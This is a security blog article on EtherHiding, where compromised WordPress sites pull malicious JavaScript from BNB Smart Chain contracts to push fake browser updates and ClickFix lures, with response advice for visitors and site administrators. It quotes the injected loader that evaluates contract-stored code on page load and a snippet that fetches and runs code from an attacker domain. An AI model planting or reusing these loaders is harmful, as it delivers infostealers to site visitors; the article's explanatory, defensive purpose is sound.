Binance Smart Contracts Blockchain Abused in Malware Spreading

Stephanie Adlam
6 Min Read
Binance Smart Contracts Abused in Malware Delivery
Hackers found the way to deploy malicious scripts via smart contracts

Cybercriminals abuse BNB Smart Chain contracts to store and retrieve malware-delivery code, making that part of their infrastructure difficult to take down. The historical EtherHiding chain below used fake browser updates to distribute infostealers. A September 2026 report adds a BSC testnet and WebRTC branch: code running in a visitor’s browser and a command the visitor runs on Windows are different stages to investigate.

September 2026: BSC Testnet and a WebRTC Branch

Netskope reported more than 5,400 compromised sites across over 2,200 organizations on September 3, 2026. These count sites and organizations, not infected PCs. Initial CMS access was unknown; examined sites were mostly WordPress, with some PrestaShop.

An injected site loader sends an eth_call request to a BSC testnet contract and runs the returned JavaScript. Changing the contract’s stored payload changes what subsequent visitors receive. Testnet uses free development tokens, avoiding real-BNB update fees. In the ClickFix branch, the script presents a fake CAPTCHA; the visitor’s pasted command then downloads and runs a payload.

The WebRTC variant instead receives a browser stager. It supplies hardcoded peer-connection details, collects code over a data channel, and executes the assembled script. This is a browser-code delivery mechanism; it does not establish which final malware ran on a particular computer.

The distinction matters: the familiar website is only the entry point, the contract controls the next browser script, and the branch determines what happens afterward. Netskope’s report is listed in References.

Match the Response to What Happened

  • You only loaded the page: close it and do not follow its update or CAPTCHA commands. Browser script may already have run; record any download, permission request, or security alert. Do not infer an OS infection solely from the website’s inclusion in this campaign.
  • You ran a command or downloaded program: treat that as possible device exposure. Follow the checks after running a ClickFix command, including containment and account recovery when relevant. That guide’s named malware is a separate case, not attribution for this campaign.
  • You administer the affected site: preserve logs and compare CMS files, themes, plugins, and administrator changes with a trusted baseline. Remove the injected loader and investigate how it arrived; a visitor’s PC scan cannot repair your website. Recheck the served page after cleanup.

For another delivery chain that uses a related idea, see PavinLoader’s ClickFix and fake-download campaign. Shared blockchain infrastructure is not enough to equate the actors or payloads.

Cybercriminals Use BSCs As C2 Infrastructure

Guardio described the technique, coined EtherHiding, in October 2023. The following code examples and diagram explain that historical fake-update chain. Analysts noticed the shift in the networking patterns of a now-old scheme that tricks users into installing malware disguised as browser updates. Instead of pulling the malicious code from Cloudflare Workers, they now direct their request towards smart contracts on Binance.

Smart contracts, in their essence, are code elements that are executed when certain conditions are met, in this case – a correct request is sent. This makes them similar to Cloudflare Workers, which effectively allowed frauds to use genuine Cloudflare servers to host malicious code delivery. A key difference is that the stored payload is on a blockchain, making it difficult to remove through a conventional hosting-abuse report. Defenders can still block access paths or remove the injected website loader. And this is probably why cybercriminals started to pay them so much attention, aside from the fact these contracts are dirt cheap. But more on that later.

How Malware Spreads via Binance Smart Contracts?

The historical attack chain begins with a compromised website. WordPress core, stolen administrator credentials, and vulnerabilities in popular plugins are possible investigation paths; they do not identify the entry point of every affected site. After compromising the website, hackers set a specific script that communicates with Binance web API.

async function load() {
    let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
        signer = provider.getSigner(),
        address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
        ABI = [
            { inputs: [{ internalType: "string", .......},
            { inputs: [], name: "get", ......},
            { inputs: [], name: "link", ....... },
        ],
        contract = new ethers.Contract(address, ABI, provider),
        link = await contract.get();
    eval(atob(link));
}
window.onload = load;

In between these operations, attackers create a new smart contract, and add the malicious code to it through the update function of the contract. This locks the entire scheme in the “ready-to-fire” position.

BCS malware delivery scheme

After entering the compromised site, the user triggers the mechanism, making the website send the get() request to the associated smart contract. The response contains a binary code string; through using the eval() function, hackers make the user’s browser execute this code. This is what defaces the website and causes the “update browser” banner to appear.

Experienced users may feel something fishy happening, as browsers never ask for the update in such a manner, but the majority of people will take it for granted. Clicking the “Update …” button on that image will execute the script grabbed from the smart contract and download the final payload. Cybercriminals typically use a bunch of one-day websites that return the payload. In the historical fake-update campaigns, malware like Lumma Stealer, Redline and Vidar was associated with this delivery approach.

const get_k_script = () => {
   let e = new XMLHttpRequest();
   return e.open("GET", "https://921hapudyqwdvy[.]com/vvmd54/", !1), e.send(null), e.responseText;
};
eval(get_k_script());

Is this new practice dangerous?

It is hard to estimate the dangers that come from this trick, but it has several major benefits compared to all other methods adversaries used in the past.

The most noticeable among them is that, as I said, Binance Smart Contracts are nearly impossible to take down. Cybercriminals are ready to pay hefty sums for running their infrastructure on “bulletproof hostings”. That is a common name for ones that have little to no downtimes and do not cooperate with law enforcement. That comparison concerns the resilience of the stored code; it does not make every delivery endpoint immune to disruption. The blockchain storage and the RPC services used to read it are different layers: an access endpoint can still be blocked or disrupted, including by DDoS attacks. Public wallet and transaction records can support investigation, even when they do not directly identify the person operating the contract.

One more benefit, that beats even the “classic” bulletproof hostings, is the price. Mainnet deployments and state-changing transactions incur gas fees; a read-only eth_call does not require a transaction fee. Guardio’s 2023 analysis reported roughly $0.02–$0.60 per relevant transaction, making frequent changes inexpensive in that case. Those historical figures are not a current tariff. The testnet branch above removes the need to spend real BNB on those updates.

Overall, this new modus operandi may bring dramatic changes to how malware is spreading nowadays. Series of recent disruptions of operations made it clear that the previous model does not have a promising future, to say the least. With the abuse of smart contracts, regardless of the blockchain they’re based off, the malware spreading may take a new sharp turn up.

Protecting Against Malicious Binance Smart Contracts

The contract is only one part of the chain: removing a site loader, blocking an unauthorized connection, or refusing a fake-update command can interrupt other stages. If you ran an untrusted Windows command or program, a full Gridinsoft Anti-Malware scan can check for malware and persistence left on the device. Use account-recovery steps separately when credentials or sessions may be exposed.

Binance Smart Contracts Blockchain Abused in Malware Spreading

References

  1. Tal, N.; Zaytsev, O. “EtherHiding — Hiding Web2 Malicious Code in Web3 Smart Contracts.” Guardio Labs, October 13, 2023. Historical EtherHiding analysis.
  2. Marquez, J. C. “Malware on the Blockchain: An Ongoing Campaign’s New WebRTC Twist.” Netskope, September 3, 2026. BSC testnet and WebRTC findings.
Share This Article
Follow:
Stephanie is our wordsmith, transforming technical research into engaging content that resonates with users. Her expertise in cybercrime prevention and online safety ensures that Gridinsoft's advice is accessible to everyone—whether they’re tech-savvy or not.
Leave a Comment

AI Assistant

Hello! 👋 How can I help you today?